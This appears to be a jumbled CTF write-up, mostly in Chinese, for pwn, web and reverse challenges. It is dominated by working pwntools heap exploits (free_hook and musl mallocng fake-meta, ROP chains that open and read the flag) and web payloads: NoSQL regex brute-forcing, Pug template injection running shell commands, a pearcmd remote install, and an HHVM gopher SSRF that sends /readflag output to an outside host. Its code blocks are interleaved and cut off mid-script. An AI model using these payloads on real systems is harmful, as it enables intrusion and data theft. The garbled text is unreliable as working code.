return p8(2) + p8(4)
payload = b''
payload += calloc(0xb0)
payload += heal() * 4
payload += free()
payload += p8(2) + p8(3)*2 + p8(0x20)
payload += p8(2) + p8(0)
for i in range(6):
payload += calloc(0xb0)
payload += heal()
payload += free()
payload += calloc(0xb0)
payload += heal() *4
# child
payload += free()
payload += malloc(0)
payload += attack() * 10
payload += heal()
payload += attack() * 5
payload += heal() * 2
payload += p8(19)
payload += attack()
payload += heal()
payload += p8(6) + p8(0)
payload += heal()
payload += clear_bit(5)
payload += heal()
payload += clear_bit(4,1,1)
payload += heal()
circle1 = b''
circle1 += heal()
circle1 += heal()
circle1 += jg(2,0)
circle1 += heal()
circle1 += attack()
circle1 += heal()
circle1 += p8(11) + p16(3 + 3+2 +2)
circle1 += heal()
circle1 += add(2,1)
circle1 += heal()
circle1 += p8(9) + p16(0x10000 - 3-3-3-3-8 -2-2-2)
payload += circle1
payload += heal()
payload += padding()
payload += heal()
payload += clear_bit(4)
payload += heal()
payload += clear_bit(4,idx=1)
payload += heal()
payload += clear_bit(4,idx=2)
payload += heal()
payload += clear_bit(3,1,1)
payload += heal()
payload += heal()
payload += circle1
payload += heal()
payload += padding()
payload += heal()
payload += clear_bit(3)
payload += heal()
payload += clear_bit(3,idx=1)
payload += heal()
payload += clear_bit(3,idx=2)
payload += heal()
payload += clear_bit(2,1,1)
payload += heal()
payload += heal()
payload += circle1
payload += heal()
payload += padding()
payload += heal()
payload += clear_bit(2)
payload += heal()
payload += clear_bit(2,idx=1)
payload += heal()
payload += clear_bit(2,idx=2)
payload += heal()
payload += clear_bit(1,1,1)
payload += heal()
payload += heal()
payload += circle1
payload += heal()
payload += padding()
payload += heal()
payload += p8(19)
payload += heal()
payload += free()
payload += heal()
payload += malloc(0x10)
payload += heal()
payload += malloc(0x10)
payload += heal()
payload += malloc(0x10)
payload += heal()
payload += heal()
payload += malloc(0xe0)
payload += heal()
payload += heal()
payload += free()
payload += free()
payload += free()
payload += free()
p.recvuntil('length:')
p.sendline(str(len(payload)))
p.recvuntil(':')
p.send(payload)
for i in range(8):
send_data('aaa\n')
p.recvuntil('dragon\'s attack')
s = p.recvuntil(b'Reprisal')
count1 = len(re.findall(b'Despair',s)) - 3
s = p.recvuntil(b'Reprisal')
count2 = len(re.findall(b'Despair',s))-2
s = p.recvuntil(b'Reprisal')
count3 = len(re.findall(b'Despair',s))-2
s = p.recvuntil(b'Reprisal')
count4 = len(re.findall(b'Despair',s))-2
log.info('leak libc ' + hex(count1))
log.info('leak libc ' + hex(count2))
log.info('leak libc ' + hex(count3))
log.info('leak libc ' + hex(count4))
leak_libc = b'\x90' + (chr(count4) + chr(count3) + chr(count2) + chr(count1)).bytes()
+b'\x7f\x00\x00'
leak_libc = u64(leak_libc) - 2014352
log.info('leak libc ' + hex(leak_libc))
send_data(p64(libc.symbols['__free_hook'] + leak_libc ) + b'\n')
# send_data("/bin/sh\n")
send_data(p64(libc.symbols['system']+ leak_libc) + b'\n')
send_data(p64(libc.symbols['system']+ leak_libc) + b'\n')
launch_gdb()
send_data('/bin/sh\n')
# 0x7f061b34f000
p.interactive()
sharing
show 和 edit的idx都没有检查
from pwn import *
libc = ELF('./libc-2.27.so')
# p = process("./sharing",env={"LD_PRELOAD":"./libc-2.27.so"})
# p = process("chroot . ./sharing".split(' '))
p = remote('124.70.137.88', 30000)
# p = remote('0', 9999)
context.log_level = 'debug'
def launch_gdb():
context.terminal = ['xfce4-terminal', '-x', 'sh', '-c']
gdb.attach(proc.pidof(p)[0])
def add(i,s):
p.sendlineafter(':','1')
p.sendlineafter(':',str(i))
p.sendlineafter(':',str(s))
def move(i,s):
p.sendlineafter(':','2')
p.sendlineafter(':',str(i))
p.sendlineafter(':',str(s))
def show(i):
p.sendlineafter(':','3')
p.sendlineafter(': ',str(i))
def edit(i,s):
p.sendlineafter(':','4')
p.sendlineafter(':',str(i))
p.sendafter(':',s)
add(0,0x500)
add(1,0x500)
move(1,0)
add(2,0x500)
show(2)
p.recvuntil('\x7f\x00\x00')
leak_libc = u64(p.recvuntil('\x7f') + '\x00\x00') - 4111520
log.info("leak libc " + hex(leak_libc))
add(3,0x100)
add(4,0x100)
add(5,0x100)
add(6,0x100)
move(4,3)
move(6,5)
musl
-1随便溢出
add(7,0x100)
show(7)
leak_heap = u64(p.recv(6) + '\x00\x00')
log.info('leak heap ' + hex(leak_heap)) # 0x55946d498c50 0x561266f75050
fake_chunk = leak_heap - 2704
# fake_index = 374
fake_index = 566
fake_ptr = p64(fake_chunk + 0x30) + p64(fake_chunk + 0x20)
fake_ptr += p64(fake_chunk + 0x60) + p64(0x0000000100000002) + p64(0x100) +
p64(leak_libc + libc.symbols['__free_hook']) \
+ p64(0)+ p64(0x111)
fake_ptr = fake_ptr.ljust(0x50,'\x00')
fake_ptr += p64(0xdeadbeef) * 8
edit(2,fake_ptr)
edit(fake_index,p64(leak_libc + libc.symbols['system']))
add(8,0x100)
add(9,0x100)
edit(8,'/bin/sh\x00')
move(9,8)
p.interactive()
from pwn import *
def add(idx,size,buf):
s.sendlineafter(b">>",b"1")
s.sendlineafter(b"idx?",str(idx).encode())
s.sendlineafter(b"size?",str(size).encode())
s.sendafter(b"Contnet?",buf)
def free(idx):
s.sendlineafter(b">>",b"2")
s.sendlineafter(b"idx?",str(idx).encode())
def show(idx):
s.sendlineafter(b">>",b"3")
s.sendlineafter(b"idx?",str(idx).encode())
# s = process("./r")
s = remote("123.60.25.24","12345")
add(0,3,b"A\n")
# add(1,5,b"BBBB")
for i in range(1,14):
add(i,3,str(i)+"\n")
free(0)
add(14,3,b'1\n')
add(0,0,b'A'*14+p16(0x202)+b"\n")
show(0)
libc = ELF("./libc.so")
libc.address = u64(s.recvuntil("\x7f")[-6:]+b"\x00\x00")-0x298d0a
success(hex(libc.address))
secret_addr = libc.sym['__malloc_context']
free(2)
add(0,0,b'A'*0x10+p64(secret_addr)+p32(0x1000)+b"\n")
show(3)
s.recvuntil(b"Content: ")
secret = u64(s.recv(8))
success(hex(secret))
# add(3,0,b'tttt')
free(4)
free(5)
add(15,0xa9c,'a\n')
fake_meta_addr = libc.address+0x293010
fake_mem_addr = libc.address+0x298df0
fake_mem = p64(fake_meta_addr)+p64(1)
sc = 10 # 0xbc
freeable = 1
last_idx = 1
maplen = 2
fake_meta = p64(libc.sym['__stdin_FILE']-0x18)#next
fake_meta += p64(fake_mem_addr)#priv
fake_meta += p64(fake_mem_addr)
fake_meta += p64(2)
fake_meta += p64((maplen << 12) | (sc << 6) | (freeable << 5) | last_idx)
fake_meta += p64(0)
add(15,0xa9c,b'\x00'*0x550+p64(secret)+p64(0)+fake_meta+b"\n")
add(0,0,b'\x00'*0x20+fake_mem+p64(0)+b"\x00"*0x30+b'\x00'*5+b"\x00"+p16(0x4)+p64(fake_m
em_addr+0xa0)+b"\n")
free(9)
add(1,0xb0,b'123\n')
free(15)
add(15,0xa9c,'123\n')
fake_meta = p64(libc.sym['__stdin_FILE']-0x18)#next
fake_meta += p64(fake_mem_addr)#priv
fake_meta += p64(libc.sym['__stdin_FILE']-0x10)
fake_meta += p64(2)
fake_meta += p64((maplen << 12) | (sc << 6) | (freeable << 5) | last_idx)
fake_meta += p64(0)
add(15,0xa9c,b'\x00'*0x550+p64(secret)+p64(0)+fake_meta+b"\n")
# gdb.attach(s,"dir ./mallocng\nb *$rebase(0xd16)\nc")
s.sendlineafter(b">>",b"1")
s.sendlineafter(b"idx?",str(0).encode())
s.sendlineafter(b"size?",str(0xb0).encode())
ret = libc.address+0x0000000000000598
pop_rdi = libc.address+0x0000000000014b82
pop_rsi = libc.address+0x000000000001b27a
pop_rdx = libc.address+0x0000000000009328
mov_rsp = libc.address+0x000000000004a5ae
payload =
p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(libc.sym['__stdout_FILE']-64)+p64(pop_rdx)+p64(0x3
00)
payload += p64(libc.sym['read'])
payload = payload.ljust(64,b'\x00')
payload +=
b'A'*32+p64(1)+p64(1)+p64(libc.sym['__stdout_FILE']-64)+p64(ret)+p64(3)+p64(mov_rsp)+b"
\n"
s.send(payload)
payload = b'/home/ctf/flag/flag\x00'
payload = payload.ljust(24,b'\x00')
payload +=
p64(pop_rdi)+p64(libc.sym['__stdout_FILE']-64)+p64(pop_rsi)+p64(0)+p64(libc.sym['open']
)
payload +=
p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(libc.sym['__stdout_FILE']+0x100)+p64(pop_rdx)+p64(
0x50)+p64(libc.sym['read'])
payload +=
p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(libc.sym['__stdout_FILE']+0x100)+p64(pop_rdx)+p64(
0x500)+p64(libc.sym['write'])
s.send(payload)
s.interactive()
ezheap
功能⾥的index都能越界
可以通过got偏移,获得libc的bss段读取写⼊权限,然后打stdout的虚表微偏移,打到附近的⼀个虚表,调⽤puts
时会调⽤free(stdout+固定偏移),在固定偏移附近布局 ;sh\\x00 ,再改写free hook。
from pwn import *
context.log_level="debug"
p=remote('123.60.25.24',20077)#process("./ezheap")
libc=ELF("./libc.so.6")
sla=lambda y,x:p.sendlineafter(y,x)
def leakoff(off):
#base 0xf7fcc5c0 free_hook:0xf7fcd8d0 stdout:0xf7fccd80
sla("choice>>","3")
sla("type ","3")
sla("idx>>","-2071")
sla("_idx",str(off))
p.recvuntil("value>>\n")
return int(p.recvline())
def editoff(off,val):
sla("choice>>","2")
sla("type ","3")
sla("idx>>","-2071")
sla("_idx",str(off))
p.recvuntil("value>>")
p.sendline(str(val))
fvtbl=leakoff(496+148//4)
libc_base=fvtbl-libc.sym['_IO_file_jumps']
print(hex(libc_base))
bin_sh=next(libc.search(b"/bin/sh\x00"))+libc_base
system=libc_base+libc.sym['system']
#gdb.attach(p,"b free\nc\n")
editoff(496,0)
editoff((0xf7fcd8d0-0xf7fcc5c0)//4,system)
editoff(496,0)
editoff(496,0)
fvtbl+=0xE0-0x80-8
editoff(496+72//4+1,u32(b';sh\x00'))
editoff(496+148//4,fvtbl)
p.interactive()
catch_the_frog
输⼊是 Native Object Protocols 协议
编译了⼀份 libnop 的 binary, 对着有符号版本的逆了⼀下发现 object 的格式是
std::int32_t age_years; std::uint64_t height_inches; std::uint64_t weight_pounds; std::string name;
这样⼦的结构体
参照 libnop ⽂档写了个交互c++程序
⽤下⾯的binary和python脚本和题⽬进⾏交互,剩下的是⼀个 2.27 的libc堆溢出菜单题
#include <cstdint>
#include <iostream>
#include <sstream>
#include <string>
#include <vector>
#include <nop/serializer.h>
#include <nop/structure.h>
#include <nop/utility/stream_writer.h>
#include <array>
#include <cstdint>
#include <iostream>
#include <map>
#include <sstream>
#include <string>
#include <vector>
#include <nop/serializer.h>
#include <nop/utility/die.h>
#include <nop/utility/stream_reader.h>
#include <nop/utility/stream_writer.h>
namespace example {
struct Person {
std::int32_t age_years;
std::uint64_t height_inches;
std::uint64_t weight_pounds;
std::string name;
NOP_STRUCTURE(Person, age_years, height_inches, weight_pounds, name);
};
} // namespace example
int main(int argc, char** argv) {
using Writer = nop::StreamWriter<std::stringstream>;
nop::Serializer<Writer> serializer;
int32_t opcode;
uint64_t index;
uint64_t size;
std::string input;
std::cout << "opcode: " << std::endl;
std::cin >> opcode;
std::cout << "index: " << std::endl;
std::cin >> index;
std::cout << "size: " << std::endl;
std::cin >> size;
std::cout << "input: " << std::endl;
std::cin >> input;
serializer.Write(example::Person{opcode, index, size, input});
const std::string data = serializer.writer().stream().str();
std::cout << data;
}
from pwn import *
cn = remote("124.70.137.88", 10000)
#cn = process("./catch_the_frog")
def message(opcode, index, size, input):
p = process("./gg")
p.sendlineafter("opcode: \n", str(opcode))
p.sendlineafter("index: \n", str(index))
p.sendlineafter("size: \n", str(size))
p.sendlineafter("input: \n", input)
message = p.recvall()
return message
def freed(index):
t = message(0, index, 0 , "a")
cn.sendlineafter(" a request, length:", str(len(t)))
cn.sendafter("Reading request:", t)
def create(size):
t = message(1, 0, size, "a")
cn.sendlineafter(" a request, length:", str(len(t)))
cn.sendafter("Reading request:", t)
def read(index, input):
t = message(2, index, 0, input)
cn.sendlineafter(" a request, length:", str(len(t)))
cn.sendafter("Reading request:", t)
def write(index):
t = message(3, index, 0, "a")
cn.sendlineafter(" a request, length:", str(len(t)))
cn.sendafter("Reading request:", t)
def free(index):
t = message(4, index, 0, "a")
cn.sendlineafter(" a request, length:", str(len(t)))
cn.sendafter("Reading request:", t)
create(0xb0)
create(0xb0)
create(0xb0)
create(0xb0)
create(0xb0)
create(0xb0)
create(0xb0)
create(0xb0) #7
create(0x10)
for i in range(8):
free(i)
create(0x50) #0
write(0)
cn.recvuntil("Greeting from ")
tmp = cn.recv(6)
addr = u64(tmp + b"\x00\x00")
free_hook = addr + 0x1b98
sys_addr = addr - 0x39c800
print(hex(addr))
create(0x80) #1
create(0x150) #2
create(0x30) #4
create(0x60) #4
create(0x60) #5
for i in range(8):
freed(2)
read(2, b"b" * 0xf8 + p64(0xa1))
free(4)
free(5)
create(0x90) #4
read(4, b"c" * 0x70 + p64(free_hook))
create(0x60) #5
create(0x60) #6
unistruct
C++逆向
vector+variant(size=32)
type1=int,type2=float.type3=std string,type4=vector
vector edit时可以选择append,当新size超过vector容量时会⽤realloc扩容,此时迭代器还指向原来的地址,从⽽
写⼊[原迭代器地址,新vector空间末尾]这⼀段的内存
相当于堆段⼀个地址区间单次任意读写
考虑靠unsorted bin泄漏libc,再靠tcache打free_hook
print(pidof(cn))
read(6, p64(sys_addr))
read(5, "/bin/sh\x00")
free(5)
success(hex(free_hook))
success(hex(sys_addr))
cn.interactive()
from pwn import *
context.log_level='debug'
context.terminal=["tmux","splitw","-h"]
libc=ELF("libc.so.6")#ELF("/glibc/2.27/64/lib/libc-2.27.so")
p=remote('124.70.137.88',40000)#process("./unistruct")
#gdb.attach(p)
sla=lambda x,y:p.sendlineafter(x.encode('ascii'),y.encode('ascii'))
def alloc(idx,size):
sla("Choice","1")
sla("Index",str(idx))
sla("Type","4")
sla("Value",str(size))
def free(idx):
sla("Choice","4")
sla("Index",str(idx))
def show(idx):
sla("Choice","3")
sla("Index",str(idx))
def enter_edit(idx):
sla("Choice","2")
sla("Index",str(idx))
def edit0():
p.recvuntil(b"Old value:")
return int(p.recvline())
def edit1(val,inplace=False):
if inplace:
sla("place","1")
else:
sla("place","0")
sla("New",str(val))
alloc(0,1) #attack
alloc(1,1) #pad
alloc(5,1) #pad2
alloc(2,512) #unsorted leak
alloc(3,1) #pad
alloc(4,8) #pad2
free(2) #2 in unsorted
free(4) #4 in tcache
free(1) #1 in tcache
'''gdb.attach(p)
p.interactive()
exit(0)'''
enter_edit(0)
for i in range(4):
edit0(),edit1(0)
for i in range(24):
v=edit0()
edit1(v,1)
v=edit0()
edit1(v,1)
v1=edit0()
edit1(v1,1)
leak_libc=((v1<<32)|v)-0x7f5dde669ca0+0x7f5dde27e000
edit0(),edit1(0xCAFEBABE,1) #exit
print(hex(leak_libc))
#gdb.attach(p)
free_hook=leak_libc+libc.sym['__free_hook']
system=leak_libc+libc.sym['system']
alloc(6,1) #victim
alloc(7,16) #realloc target
alloc(8,1)
print("alloc done")
#input()
free(7)
free(6)
enter_edit(0)
for i in range(4):
edit0(),edit1(0)
#now get victim! at 0x20.2
edit0(),edit1(free_hook&0xffffffff,1)
edit0(),edit1(free_hook>>32,1)
edit0(),edit1(0xCAFEBABE,1) #exit
alloc(9,2)
enter_edit(9)
edit0(),edit1(system&0xffffffff,1)
warmnote
edit处有off by one null
calloc还要诡异的伪造⼀下meta
edit0(),edit1(system>>32,1)
enter_edit(3)
edit0(),edit1(26739,1)
p.interactive()
from pwn import *
def add(size,title,note):
s.sendlineafter(b">>",b"1")
s.sendlineafter(b"Size: ",str(size).encode())
s.sendafter("Title: ",title)
s.sendafter("Note: ",note)
def show(idx):
s.sendlineafter(b">>",b"2")
s.sendlineafter(b"Index: ",str(idx).encode())
def free(idx):
s.sendlineafter(b">>",b"3")
s.sendlineafter(b"Index: ",str(idx).encode())
def edit(idx,note):
s.sendlineafter(b">>",b"4")
s.sendlineafter(b"Index: ",str(idx).encode())
s.sendafter(b"Note: ",note)
# s = process("./warmnote")
s = remote("124.70.137.88","20000")
add(0x30,b'A'*16,b'A'*0x30)
add(0x30,b'A'*16,b'A'*0x30)
add(0x30,b'A'*16,b'A'*0x30)
free(0)
free(1)
add(0x30,b'A'*16,b'A'*0x30)
add(0xa9c,b'A'*16,b'dead\n')
show(1)
libc = ELF("./libc.so")
libc.address = u64(s.recvuntil("\x7f")[-6:]+b"\x00\x00")+0x1ff0
success(hex(libc.address))
secret_addr = libc.address+0xb4ac0
s.sendlineafter(b">>",b"666")
s.sendlineafter(b"[IN]: ",str(secret_addr).encode())
s.recvuntil(b"[OUT]: ")
secret = u64(s.recv(8))
success(hex(secret))
free(2)
free(3)
free(0)
stdin_FILE = libc.address+0xb4180
fake_mem_addr = libc.address-0xac0
fake_meta_addr = libc.address-0xff0
fake_mem = p64(fake_meta_addr)+p64(1)
sc = 10 # 0xbc
freeable = 1
last_idx = 1
maplen = 2
fake_meta = p64(stdin_FILE-0x18)#next
fake_meta += p64(fake_mem_addr)#priv
fake_meta += p64(fake_mem_addr)
fake_meta += p64(2)
fake_meta += p64((maplen << 12) | (sc << 6) | (freeable << 5) | last_idx)
fake_meta += p64(0)
payload = p64(0xdeadbeef)*2+b'\x00'*1344+p64(secret)+b'\x00'*8+fake_meta
add(0xa98,b'A'*16,payload+b"\n")#0
add(0xa9c,b'A'*16,p64(stdin_FILE-0x10)+p64(0)+p64((maplen << 12) | (sc << 6) |
(freeable << 5) | last_idx)+p64(0)+b"\n")#2
# gdb.attach(s,"dir ./mallocng\nb free\nc")
edit(0,payload.ljust(0xa90,b"\x00")+fake_mem[:0x8])
free(2)
add(0xbc,b'A'*16,b"123\n")#0
fake_meta = p64(stdin_FILE-0x18)#next
fake_meta += p64(fake_mem_addr)#priv
fake_meta += p64(stdin_FILE-0x10)
fake_meta += p64(2)
fake_meta += p64((maplen << 12) | (sc << 6) | (freeable << 5) | last_idx)
fake_meta += p64(0)
payload = p64(0xdeadbeef)*2+b'\x00'*1344+p64(secret)+b'\x00'*8+fake_meta+b"\n"
free(0)
Web
add(0xa9c,b'A'*16,payload)
# gdb.attach(s,"b *$rebase(0x1306)\nc")
s.sendlineafter(b">>",b"1")
s.sendlineafter(b"Size: ",str(0xbc).encode())
s.sendafter("Title: ",b'A'*16)
stdout_FILE=libc.address+0xb4280
ret = libc.address+0x00000000000152a2
pop_rdi = libc.address+0x00000000000152a1
pop_rsi = libc.address+0x000000000001dad9
pop_rdx = libc.address+0x000000000002cdae
mov_rsp = libc.address+0x000000000007b1f5
syscall = libc.address+0x00000000000238f0
pop_rcx = libc.address+0x0000000000016dd5
pop_rax = libc.address+0x0000000000016a96
payload = p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(stdout_FILE-70)+p64(pop_rdx)+p64(0x300)
payload += p64(libc.sym['read'])
payload = payload.ljust(64,b'\x00')
payload += b'A'*32+p64(1)+p64(1)+p64(stdout_FILE-64)+p64(ret)+p64(3)+p64(mov_rsp)+b"\n"
s.send(payload)
payload = b'./flag\x00'
payload = payload.ljust(30,b'\x00')
payload += p64(pop_rdi)+p64(stdout_FILE-
70)+p64(pop_rsi)+p64(0)+p64(pop_rax)+p64(2)+p64(syscall)
payload +=
p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(stdout_FILE+0x100)+p64(pop_rdx)+p64(0x50)+p64(libc
.sym['read'])
payload +=
p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(stdout_FILE+0x100)+p64(pop_rdx)+p64(0x500)+p64(lib
c.sym['write'])
s.send(payload)
s.interactive()
ns_shaft_sql
#-*-coding=utf-8-*-
import requests
import base64
import threading
s = requests.Session()
url = "http://124.71.132.232:23334/"
def execute(query):
global s,url
query = base64.b64encode(query)
res = s.get(url+"?sql="+query).text
print(res)
k = res.split("Your key is ")[1].split('\n')[0].strip()
return k
def create_func():
c_query = '''select 123;'''
print(c_query)
return execute(c_query)
k = create_func()
l = '''ASCII
CHAR_LENGTH
CHARACTER_LENGTH
CONCAT
CONCAT_WS
FIELD
FIND_IN_SET
FORMAT
INSERT
INSTR
LCASE
LEFT
LENGTH
LOCATE
LOWER
LPAD
LTRIM
MID
POSITION
REPEAT
REPLACE
REVERSE
RIGHT
RPAD
RTRIM
SPACE
STRCMP
SUBSTR
SUBSTRING
SUBSTRING_INDEX
TRIM
UCASE
UPPER
ABS
ACOS
ASIN
ATAN
ATAN2
AVG
CEIL
CEILING
COS
COT
COUNT
DEGREES
DIV
EXP
FLOOR
GREATEST
LEAST
LN
LOG
LOG10
LOG2
MAX
MIN
MOD
PI
POW
POWER
RADIANS
RAND
ROUND
SIGN
SIN
SQRT
SUM
TAN
TRUNCATE
ADDDATE
ADDTIME
CURDATE
CURRENT_DATE
CURRENT_TIME
CURRENT_TIMESTAMP
CURTIME
DATE
DATE_ADD
DATE_FORMAT
DATE_SUB
DATEDIFF
DAY
DAYNAME
DAYOFMONTH
DAYOFWEEK
DAYOFYEAR
EXTRACT
FROM_DAYS
HOUR
LAST_DAY
LOCALTIME
LOCALTIMESTAMP
MAKEDATE
MAKETIME
MICROSECOND
MINUTE
MONTH
MONTHNAME
NOW
PERIOD_ADD
PERIOD_DIFF
QUARTER
SEC_TO_TIME
SECOND
STR_TO_DATE
SUBDATE
SUBTIME
SYSDATE
TIME
TIME_FORMAT
TIME_TO_SEC
TIMEDIFF
TIMESTAMP
TO_DAYS
WEEK
WEEKDAY
WEEKOFYEAR
YEAR
YEARWEEK
BIN
BINARY
CASE
CAST
COALESCE
CandyShop
nosql注⼊+pug模板注⼊
跑出密码之后登录
POST /shop/order
username=1&candyname=1&address='+flag=global.process.mainModule.constructor._load('child_process').
execSync("cat+/flag").toString()+a='
CONNECTION_ID
CONV
CONVERT
CURRENT_USER
DATABASE
IF
IFNULL
ISNULL
LAST_INSERT_ID
NULLIF
SESSION_USER
SYSTEM_USER
USER
VERSION
ENCRYPT
MD5
OLD_PASSWORD
PASSWORD'''
l = l.split("\n")
for i in l:
execute("set @@sql_mode:=(select concat(0x22,v) from s where `k`='"+k+"')/*"+i+"
(1,1,1)*/;")
import requests as req
chars = '0123456789abcdef'
ans = ''
j = 0
for pos in range(1,64):
for ch in chars:
data = {'username':'rabbit','password[$regex]':'^'+ans+ch+'.*$'}
res = req.post('http://123.60.21.23:23333/user/login',data )
#res = req.post('http://127.0.0.1:3000/user/login',data )
if 'Bad' in res.text:
ans += ch
break
print(pos,ans)
VerySafe
?list+install+—installroot+/tmp/+http://49.234.52.70:8080/++++++++++++++$&f=pearcmd&
hiphop
hhvm/4.126.0
to enable the debugging extension
to optionally change the port the debugger listens on (default:
)
hhvm -mserver-dhhvm.server.thread_count=100 -dhhvm.http.default_timeout=1 -
dhhvm.server.connection_timeout_seconds=1 -dhhvm.debugger.vs_debug_enable=1 -
dhhvm.server.port=8080 -dhhvm.repo.central.path=/tmp/hhvm.hhbc -
dhhvm.pid_file=/tmp/hhvm.pid -dhhvm.server.whitelist_exec=true -
dhhvm.server.allowed_exec_cmds[]= -dhhvm.server.request_timeout_seconds=1 -
dopen_basedir=/var/www/html
hhvm.debugger.vs_debug_enable=1
hhvm.debugger.vs_debug_listen_port=<port>
8999
import requests
import urllib
import json
payload =
'''%7b%22command%22%3a%22attach%22%2c%22arguments%22%3a%7b%22name%22%3a%22hhvm%3a%20att
ach%20to%20server%22%2c%22type%22%3a%22hhvm%22%2c%22request%22%3a%22attach%22%2c%22host
%22%3a%22localhost%22%2c%22port%22%3a8998%2c%22remotesiteroot%22%3a%22%2fvar%2fwww%2fpu
blic%2f%22%2c%22localworkspaceroot%22%3a%22%2fvar%2fwww%2fpublic%2f%22%2c%22__configura
tiontarget%22%3a5%2c%22__sessionid%22%3a%22052f86e6-5d6a-4e7c-b049-
a4ffa373b365%22%2c%22sandboxuser%22%3a%22wupco%22%7d%2c%22type%22%3a%22request%22%2c%22
seq%22%3a2%7d%00%7b%22command%22%3a%22initialize%22%2c%22arguments%22%3a%7b%22clientid%
22%3a%22vscode%22%2c%22clientname%22%3a%22visual%20studio%20code%22%2c%22adapterid%22%3
a%22hhvm%22%2c%22pathformat%22%3a%22path%22%2c%22linesstartat1%22%3atrue%2c%22columnsst
artat1%22%3atrue%2c%22supportsvariabletype%22%3atrue%2c%22supportsvariablepaging%22%3at
rue%2c%22supportsruninterminalrequest%22%3atrue%2c%22locale%22%3a%22zh-
cn%22%2c%22supportsprogressreporting%22%3atrue%2c%22supportsinvalidatedevent%22%3atrue%
2c%22supportsmemoryreferences%22%3atrue%7d%2c%22type%22%3a%22request%22%2c%22seq%22%3a1
%7d%00%7b%22command%22%3a%22evaluate%22%2c%22arguments%22%3a%7b%22expression%22%3a%22fi
le%28%27http%3a%2f%2fphp.ebcece08.o53.xyz%2f%3ftest%27%29%3b%22%2c%22context%22%3a%22re
pl%22%7d%2c%22type%22%3a%22request%22%2c%22seq%22%3a3%7d%00'''
Easyphp
/login/..;/admin 过nginx,由于flight会⾃动urldecode⼀次,%3flogin能过flight对url login字符的判断。
最后读⽂件路径2次url编码
/login/..;/admin%3flogin=aa&data=%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32
%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%
25%32%66%25%32%65%25%32%65%25%32%66%25%36%36%25%36%63%25%36%31%25%36%37
xss it?
bypass DOMPurify 2.3.1,最新版
https://github.com/cure53/DOMPurify/wiki/Security-Goals-&-Threat-Model#non-goals
考虑css反射
https://github.com/dxa4481/cssInjection
payload = urllib.unquote(payload)
phpcode = '''
$handle = popen("/readflag", "r");
$read = fread($handle, 2096);
file('http://php.ebcece08.o53.xyz/?a='.urlencode($read));
'''
phpcode = json.dumps(phpcode)
payload = payload.replace("\"file('http://php.ebcece08.o53.xyz/?test');\"", phpcode)
print(payload)
payload = urllib.quote(urllib.quote(payload))
payload = "gopher://127.0.0.1:8999/_"+payload
requests.get("http://124.71.132.232:58080/?url="+payload)
?asoul={"compileDebug":1,"filename":"aaaa\u2028function%20escapeFn()
{alert(__lines)}//","client":false,"jiaran":"a","xiangwan":"b","beila":"c","jiale":"d","nailin":"e"}
EasySQLi
Reverse
sakuretsu
Program Logic:
Pipes Game
Key Logic:
main → 413C20 (wrapper)
→ 413150 (main checker, connects tube using DFS in a iterative way)
→ 4126B0 (checks if a direction needs to be processed)
→ 412A00 (checks if two block's tube can be connected)
# -*- coding:utf8 -*-
import requests
import string
str1 = '_1234567890'+string.ascii_letters+string.punctuation
flag = ''
select = 'select/**/user()'
url="http://124.71.132.232:11002/?order="
for j in range(1,66):
for i in range(65,123):
#payload="updatexml(1,if(substr(({}),
{},1)='{}',repeat('a',40000000),0),1)".format(select, j, i)
payload="updatexml(1,if(ascii(substr(({}),
{},1))='{}',concat(repeat('a',40000000),repeat('a',40000000),repeat('a',40000000),repea
t('a',40000000),repeat('b',10000000)),1),1)".format(select, j, i)
url1 = url + payload
req = requests.get(url1)
print(req.elapsed.total_seconds())
#print(payload)
if req.elapsed.total_seconds() > 1.6 or req.elapsed.total_seconds()< 1:
flag += chr(i)
print(payload)
print(flag)
break
(...remaining flag anti-duplicating checks...)
Reverse Engineering Techniques Used:
Std Library Function Recovery: Compiled a Swift project with swift build -v --static-swift-
stdlib -c release , Then did function matching with Lumina
Swift Calling Convention Fixing: see
https://github.com/eaplatanios/swift-language/blob/master/docs/ABI/RegisterUsage.md
Use usercall and return_ptr to manually correct calling convention
Swift Internal Learning & Experiment: Use Compiler Explorer, with option -emit-sil
Manually Structure Recovery for block's class and checker's class
Defining getter and setters helps a lot
Debugging Helper:
Setting up log point on:
0x412A00 (connected block)
0x4135E6 (current block)
0x413B1F (on fail)
arr = Qword(GetRegValue('r13') + 32) + 32
print("target - x:%d y:%d rotate:%d, bits:%d%d%d%d" %
(
Qword(GetRegValue('r13') + 16), Qword(GetRegValue('r13') + 24),
Qword(GetRegValue('r13') + 48),
Byte(arr),
Byte(arr+1),
Byte(arr+2),
Byte(arr+3),
)
)
arr = Qword(GetRegValue('r13') + 32) + 32
print("currnt - x:%d y:%d rotate:%d, bits:%d%d%d%d op:%d" %
(
Qword(GetRegValue('r13') + 16), Qword(GetRegValue('r13') + 24),
Qword(GetRegValue('r13') + 48),
Byte(arr),
Byte(arr+1),
Byte(arr+2),
Byte(arr+3),
GetRegValue('rax')
)
)
Solving:
Data Extract & Manual recover: L → R
Flag Construct:
c = Qword(GetRegValue('rbp') - 0x1c8)
arr = Qword(c + 32) + 32
print("failfr - x:%d y:%d rotate:%d, bits:%d%d%d%d op:%d" %
(
Qword(c + 16), Qword(c + 24), Qword(c + 48),
Byte(arr),
Byte(arr+1),
Byte(arr+2),
Byte(arr+3),
Dword(GetRegValue('rbp') - 0x228)
)
)
c = Qword(GetRegValue('rbp') - 0x28)
arr = Qword(c + 32) + 32
print("failto - x:%d y:%d rotate:%d, bits:%d%d%d%d" %
(
Qword(c + 16), Qword(c + 24), Qword(c + 48),
Byte(arr),
Byte(arr+1),
Byte(arr+2),
Byte(arr+3),
)
)
GOOD = [ # dumped from last step
[6, 7, 3, 4, 3, 6, 3],
[8, 8, 14, 1, 10, 8, 10],
[2, 4, 13, 7, 11, 6, 9],
[14, 5, 5, 11, 12, 13, 3],
[10, 4, 7, 11, 4, 7, 9],
[8, 4, 9, 14, 1, 14, 3],
[4, 5, 5, 9, 4, 9, 8],
]
ORI = [ # dumped from last step
[3, 11, 6, 2, 12, 9, 12],
[4, 1, 7, 2, 10, 4, 5],
[1, 8, 13, 13, 7, 6, 12],
